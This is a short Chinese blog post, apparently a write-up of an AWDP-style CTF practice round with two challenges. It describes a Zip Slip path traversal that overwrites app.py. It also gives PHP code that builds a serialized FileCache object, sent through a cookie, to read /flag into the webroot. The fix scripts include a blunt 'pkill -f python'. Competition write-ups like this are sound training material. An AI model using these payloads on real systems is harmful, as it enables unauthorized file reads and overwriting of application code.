sparkctf-awdp-ciscn半决赛模拟

PHP AWDP Python

Word count: 315Reading time: 1 min

 2026/03/17 

题目本身的漏洞

zip

直接使用 os.path.join 拼接路径，如果路径不存在还会帮忙创建，将压缩包里的文件命名为../../../app.py 覆盖源码即可。

qzone

管理员密码在这里

不知道为什么比赛环境上是没有文件上传功能的，自己跑的 docker 是有的

Controller.php 有反序列化，且 cookie 的user_pref 参数可控。

e 和 s 变量都为 true 的话，将 source 赋值 content,创建一个新文件，文件名为 cacheFile，内容为 content。

<?php

  class FileCache
{
  public $cacheDir;
public $cacheFile = '/var/www/html/flag1.txt';
public $expired = true;
public $source = '/flag';
public function __destruct()
  {
    if ($this->expired && $this->source) {
      $content = file_get_contents($this->source);
      if ($this->cacheFile) {
        file_put_contents($this->cacheFile, $content);
      }
    }
  }

}

$answer = new FileCache();
$a = base64_encode(serialize($answer));
echo $a;

AWDP 的比赛形式

其实就是比 CTF，先找到漏洞打出 flag 交了，然后改代码修复漏洞。

zip

不太会修

fix 就是一个.tar.gz 压缩包，里面有要替换的文件和一个脚本

1
2
3

#!/bin/sh
cp app.py /app/app.py
pkill -f python

pkill -f python 强制结束所有包含 “python” 关键字的进程

qzone

直接把 file_get_contents 这一行注释掉

1 2	#!/bin/sh cp FileCache.php /var/www/html/core/FileCache.php

Author：温柔刀

Link：http://example.com/2026/03/17/sparkctf-awdp-ciscn%E5%8D%8A%E5%86%B3%E8%B5%9B%E6%A8%A1%E6%8B%9F/

Publish date：March 17th 2026, 4:02:02 pm

Update date：March 17th 2026, 4:31:32 pm

License：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

Previous Post

战队面试与知识体系的构建

CATALOG

1. 题目本身的漏洞
1. 1.1. zip
2. 1.2. qzone
2. AWDP 的比赛形式
1. 2.1. zip
2. 2.2. qzone